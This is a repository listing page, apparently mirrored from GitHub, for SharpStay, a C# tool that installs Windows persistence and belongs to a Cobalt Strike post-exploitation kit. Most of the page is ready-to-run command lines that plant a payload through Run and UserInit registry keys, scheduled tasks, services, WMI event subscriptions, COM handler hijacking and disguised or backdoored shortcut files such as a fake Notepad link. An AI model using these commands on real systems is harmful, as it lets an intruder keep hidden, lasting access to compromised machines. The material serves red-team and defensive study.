0xthirteen/SharpStay 0xthirteen/SharpStay

  • Stars
    star
    425
  • Rank 102,094 (Top 3 %)
  • Language
    C#
  • License
    GNU General Publi...
  • Created almost 5 years ago
  • Updated about 2 years ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
0xthirteen/SharpStay
github

0xthirteen

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

.NET project for installing Persistence

SharpStay - .NET Persistence

Building

To compile open Visual Studio project and compile for release.

Options

  • Elevated Registry Keys

  • Elevated UserInit Registry Key

  • Elevated Scheduled Task

  • Elevated Create Service

  • Elevated WMI Event Subscription

  • Non-Elevated InitMprLogonScript Registry Key

  • Non-Elevated Scheduled Task COM Handler Hijack

  • Non-Elevated Junction Folder

  • Misc Add Scheduled Task Action

  • Misc Startup Directory

  • Misc New LNK

  • Misc Backdoor LNK

  • Misc Task Names

  • Misc List Scheduled Tasks

  • Misc List Running Services

  • Misc Get Scheduled Task COM Handlers

Sharpstay.exe action=ElevatedRegistryKey keyname=Debug keypath=HKCU:Software\Microsoft\Windows\CurrentVersion\Run command="C:\Windows\temp\fun.exe"

Sharpstay.exe action=UserRegistryKey keyname=Debug keypath=HKCU:Software\Microsoft\Windows\CurrentVersion\Run command="C:\Windows\temp\fun.exe"

Sharpstay.exe action=UserInitMprLogonScriptKey command="C:\Windows\temp\fun.exe"

Sharpstay.exe action=ElevatedUserInitKey command="C:\Windows\temp\fun.exe"

Sharpstay.exe action=ScheduledTask taskname=TestTask command="C:\windows\temp\file.exe" runasuser=user1 triggertype=logon author=Microsoft Corp. description="Test Task" logonuser=user1

Sharpstay.exe action=ScheduledTaskAction taskname=TestTask command="C:\Windows\temp\fun.exe" folder="\\" actionid=ExecAction

Sharpstay.exe action=SchTaskCOMHijack clsid={a47af52a-27f9-4426-bd2b-727050712db1} dllpath="C:\windows\temp\fun.dll"

Sharpstay.exe action=CreateService servicename=TestService command="C:\Windows\temp\fun.exe"

Sharpstay.exe action=WMIEventSub command="C:\Windows\temp\fun.exe" eventname=Debugger attime=startup 

Sharpstay.exe action=JunctionFolder dllpath="C:\windows\temp\fun.dll guid={a47af52a-27f9-4426-bd2b-727050712db1}

Sharpstay.exe action=NewLNK filepath="C:\users\admin\desktop" lnkname="Notepad.lnk" lnktarget="C:\Windows\temp\file.exe" lnkicon="C:\Windows\system32\notepad.exe"

Sharpstay.exe action=BackdoorLNK command="C:\Windows\temp\fun.exe" lnkpath="C:\users\user\desktop\Excel.lnk"

Sharpstay.exe action=ListTaskNames

Sharpstay.exe action=ListScheduledTasks

Sharpstay.exe action=ListRunningServices

Sharpstay.exe action=GetScheduledTaskCOMHandler

cleanup=true is an option for each persistence type.

Part of StayKit

More Repositories

1

SharpRDP

Remote Desktop Protocol .NET Console Application for Authenticated Command Execution
C#
960
star
2

MoveKit

Cobalt Strike kit for Lateral Movement
C#
636
star
3

StayKit

Cobalt Strike kit for Persistence
455
star
4

SharpMove

.NET Project for performing Authenticated Remote Execution
C#
368
star
5

PerfExec

C#
75
star
6

AssemblyHunter

C#
74
star
7

CleanRunMRU

Get or remove RunMRU values
C#
51
star
8

FileWriter

.NET project for writing files to local or remote hosts
C#
38
star